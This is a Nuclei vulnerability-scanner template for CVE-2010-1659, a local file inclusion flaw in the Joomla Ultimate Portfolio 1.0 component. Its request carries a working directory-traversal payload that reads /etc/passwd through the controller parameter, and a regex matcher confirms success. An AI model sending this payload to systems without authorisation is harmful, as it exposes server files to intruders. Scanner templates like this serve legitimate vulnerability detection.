my-nuclei-templates/CVE-2010-1659.yaml

31 lines
1.0 KiB
YAML

id: CVE-2010-1659
info:
name: Joomla! Component Ultimate Portfolio 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in the Ultimate Portfolio (com_ultimateportfolio) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12426
- https://nvd.nist.gov/vuln/detail/CVE-2010-1659
- http://web.archive.org/web/20210121195906/https://www.securityfocus.com/bid/39739/
- http://www.exploit-db.com/exploits/12426
classification:
cve-id: CVE-2010-1659
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_ultimateportfolio&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/28